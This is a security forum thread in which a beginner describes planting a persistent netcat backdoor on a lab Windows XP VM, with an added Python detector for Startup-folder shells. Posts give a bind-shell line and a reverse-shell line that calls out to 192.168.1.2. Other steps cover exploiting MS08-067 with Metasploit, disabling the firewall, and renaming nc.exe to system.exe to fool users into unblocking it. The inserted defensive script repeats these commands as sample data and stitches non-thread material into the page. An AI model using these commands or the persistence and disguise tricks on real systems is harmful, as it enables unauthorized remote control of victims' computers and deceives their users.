
Thread: My first backdoor in Windows xp sp2 home edition

  1. #1
    Junior Member
    Join Date
    May 2009
    Posts
    61

    My first backdoor in Windows xp sp2 home edition

    I managed to do my first backdoor.

    Lab: Attacker: Dell laptop Inspiron 1525, USB BackTrack 4 pre-final

    Victim: VirtualBox Windows XP SP2 Home Edition under Linux Ubuntu 9.04.


    I think these steps are easy, so anyone who starts working with BT, as I started a few months ago, can try this to see in general how a persistent backdoor works.

    First I run Metasploit and exploit smb/ms08_067_netapi with the payload windows/meterpreter/reverse_tcp.

    After I get an active session, first I disable the firewall with Carlos Perez's script.

    Then I upload the file nc.exe to C:\ (or any directory you want) and a batch file named test.bat, which I previously made in Notepad run in Wine, which I upload to the Startup folder of the victim machine.

    Test.bat had this in the file: start C:\nc.exe -L -p 5555 -d -e cmd.exe

    After I do this and reboot the machine, my backdoor always listens on port 5555 (or you can put some other port), and every time the machine starts you can see for one second a black cmd screen which starts the listener on port 5555.

    Then just type on the attack machine: nc (ip of target) 5555 and you will get a reverse shell.

    It's far from an ideal backdoor and has many drawbacks, but I think it's a nice way to start to see how backdoors work in general.

    If someone has any suggestions (I didn't manage to bypass the firewall without disabling it with the Ruby script first) or something like that, or someone who will try this, he can ask me here and I will help him to make the same thing as me.

  2. #2
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416


    You can open a port for nc instead of disabling the firewall.
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  3. #3
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851


    Just to correct you (congratulations on your first one by the way), but that is not a reverse shell.

    If the test.bat ran:
    Code:
    nc -nw 10 -d 192.168.1.2 5555 -e cmd.exe
    That would make it a reverse shell. As it is you have yourself a bind shell.

    Incidentally, it's infinitely easier to work with reverse shells, as you don't get the "Windows is Unprotected" rubbish from the Security Center (unless, of course, you disable the Security Center, which may or may not be noticed by the user).
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  4. #4
    Junior Member
    Join Date
    May 2009
    Posts
    61


    Yes, sorry, I meant bind shell; I was fast when I wrote the post.

    Yes, of course the drawback is that it may be noticed by the user. I have many new ideas with better things; I just made this to see how it works and for some other not so experienced users to start with, because it is an easy and nice way to start working with backdoors.

    I think that this backdoor will not work in Vista because, as I remember (I must put Vista on a VM), the Startup folder is hidden.

    I think in Vista you must do something with the registry.

  5. #5
    Junior Member
    Join Date
    May 2009
    Posts
    61


    Also we can use some sort of social engineering.

    We can, for example, rename nc.exe to system.exe, all to something similar to some files from the Windows system.

    Also we can call the bat file not test but winlog.bat, for example.

    How this can help us: for example, we make a backdoor like I made mine, and on the victim machine a message pops up that the firewall is turned off after the next reboot.

    Of course the victim turns it on again. Then reboots the computer or turns it off. Next time when he boots his Windows, on the start it will say that Windows Firewall blocked a program (nc.exe, which we put in the Startup menu), but it will not say that it blocks nc.exe; it will say that it blocks, for example, system.exe, and I think any ordinary user will click unblock because he will think that it is something connected with the system, and he will unblock it. And we have our bind shell in peace.

    What do you think about that, Gitsnik?

    Also, can we somehow edit the registry with Meterpreter so that this icon when the firewall is off doesn't pop up?
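
For a defender reading posts #1 and #5, the useful observation is that the persistence described here is a plain batch file in the Startup folder that launches a netcat-style listener, and that renaming nc.exe to system.exe changes nothing about the command line. The following Python script is an added example for this thread, not code from the original posts, BackTrack or Metasploit. It classifies each command line found in Startup-folder batch files as a bind shell (listen flag plus -e/-c), a reverse shell (host and port plus -e/-c, the form Gitsnik gives in post #3) or benign, keying off the flag pattern rather than the binary name. The file names and contents in SAMPLE_STARTUP are constructed sample data; on a real host you would read the .bat/.cmd files from the per-user and all-users Startup folders and pass them to scan_startup_entries().

```python
"""Classify netcat-style launchers found in Windows Startup-folder batch files.

Added example for this thread, not code from the original posts, BackTrack
or Metasploit. SAMPLE_STARTUP is constructed sample data: on a real host you
would read the .bat/.cmd files from the per-user and all-users Startup
folders and feed their contents to scan_startup_entries().
"""
import shlex

EXEC_FLAGS = {"-e", "-c"}           # netcat-style "hand the connection to this program"
COMMENT_PREFIXES = ("rem ", "@echo", "::")


def classify_command(cmdline: str) -> dict:
    """Classify one batch line as bind_shell, reverse_shell, suspicious_exec or benign.

    Detection keys off the flag pattern, not the binary name, so the
    'rename nc.exe to system.exe' idea from post #5 does not change the verdict.
    """
    try:
        tokens = shlex.split(cmdline, posix=False)   # keep backslashes and quotes intact
    except ValueError:
        tokens = cmdline.split()
    # Batch files usually wrap the launcher in 'start' (optionally with a "" title).
    while tokens and tokens[0].lower() in ("start", '""'):
        tokens.pop(0)
    if not tokens:
        return {"kind": "benign", "exe": "", "program": None, "port": None, "remote": None}

    exe = tokens[0].strip('"')
    listen = False
    program = port = remote = None
    positional = []
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if tok in EXEC_FLAGS and nxt:
            program = nxt.strip('"')            # -e cmd.exe / -c /bin/sh
            i += 2
        elif tok.startswith("-") and tok[1:] and not tok[1:].isdigit():
            letters = set(tok[1:].lower())      # handles combined flags such as -lvp or -nw
            if "l" in letters:
                listen = True                   # -l / -L: the process listens, i.e. a bind shell
            if ("w" in letters or "p" in letters) and nxt.isdigit():
                if "p" in letters:
                    port = int(nxt)             # -p <port>
                i += 2                          # -w <timeout> consumes a value as well
            else:
                i += 1
        else:
            positional.append(tok)
            i += 1

    # Outbound form: <host> <port> with no listen flag (the reverse-shell line from post #3).
    if not listen and len(positional) >= 2 and positional[-1].isdigit():
        remote, port = positional[-2], int(positional[-1])
    elif listen and port is None and positional and positional[-1].isdigit():
        port = int(positional[-1])

    if program is None:
        kind = "benign"
    elif listen:
        kind = "bind_shell"
    elif remote is not None:
        kind = "reverse_shell"
    else:
        kind = "suspicious_exec"
    return {"kind": kind, "exe": exe, "program": program, "port": port, "remote": remote}


# Constructed sample Startup-folder contents (file name -> batch file text).
SAMPLE_STARTUP = {
    # The launcher exactly as described in post #1.
    "test.bat": r"start C:\nc.exe -L -p 5555 -d -e cmd.exe",
    # The renamed-binary variant from post #5: same flags, different file name.
    "winlog.bat": "@echo off\r\n" + r"start C:\WINDOWS\system.exe -L -p 5555 -d -e cmd.exe",
    # A benign entry: quoted path plus a switch, no -e/-c and no listen flag.
    "updater.bat": r'start "" "C:\Program Files\Example\updater.exe" /silent',
}


def scan_startup_entries(entries: dict) -> list:
    """Return one finding per non-benign command line across all Startup entries."""
    findings = []
    for name, content in entries.items():
        for lineno, line in enumerate(content.splitlines(), 1):
            line = line.strip()
            if not line or line.lower().startswith(COMMENT_PREFIXES):
                continue
            result = classify_command(line)
            if result["kind"] != "benign":
                findings.append({"file": name, "line": lineno, **result})
    return findings


if __name__ == "__main__":
    for f in scan_startup_entries(SAMPLE_STARTUP):
        print(f"{f['file']}:{f['line']} {f['kind']} exe={f['exe']} "
              f"program={f['program']} port={f['port']} remote={f['remote']}")
```

Both test.bat and winlog.bat come back as bind_shell on port 5555 even though the second one never mentions nc.exe, which is the point: a Startup-folder check that trusts file names misses the rename, while one that looks at the -L/-p/-e pattern does not. The same classifier labels Gitsnik's `nc -nw 10 -d 192.168.1.2 5555 -e cmd.exe` as reverse_shell, with the host pulled out as `remote`, which is the distinction post #3 draws.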

  6. #6
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851


    Familiarise yourself with the command line "firewall" commands (no further hints than that). If you're installing your back door, you can just open up the port - assuming the windows firewall is the only one in use.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  7. #7
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416


    Quote Originally Posted by Gitsnik View Post
    Familiarise yourself with the command line "firewall" commands (no further hints than that). If you're installing your back door, you can just open up the port - assuming the windows firewall is the only one in use.
    I told you...
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  8. #8
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851


    Quote Originally Posted by kazalku View Post
    I told you...
    No what you did is provide a new guy a far-too-broad interpretation of what to do. Most people don't even know they can control the networking services from the command line.

    I am all for not baby sitting, but even I have to concede some information is hard won.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  9. #9
    Junior Member
    Join Date
    Aug 2007
    Posts
    85


    Quote Originally Posted by Gitsnik View Post
    Most people don't even know they can control the networking services from the command line.
    I was one of them. But after I read Ed Skoudis' Command Line Kung Fu, everything became clear for me.

    blog = Command Line Kung Fu

    Also there is a PDF version.
    How you spend your time is more important than how you spend your money. Money mistakes can be corrected, but time is gone forever. David Norris

  10. #10
    Just burned his ISO PeterPunk's Avatar
    Join Date
    Jul 2009
    Posts
    9


    Quote Originally Posted by Handsome-geek View Post

    Victim: VirtualBox Windows XP SP2 Home Edition under Linux Ubuntu 9.04.


    I think these steps are easy, so anyone who starts working with BT, as I started a few months ago, can try this to see in general how a persistent backdoor works.

    First I run Metasploit and exploit smb/ms08_067_netapi with the payload windows/meterpreter/reverse_tcp.

    After I get an active session ... first I disable the firewall with Carlos Perez's script.
    ...
    Sorry but... how do you get an active session with the Windows firewall on?

    I tried exactly the same scenario with a victim: VirtualBox Windows XP SP2 Pro Edition under Vista Home Premium, and I cannot get an active session unless I disable the Windows XP firewall.

    Is there something that I am missing?
    Is there any case where the firewall in XP Professional Edition has different behavior from Home Edition?

    Thnx
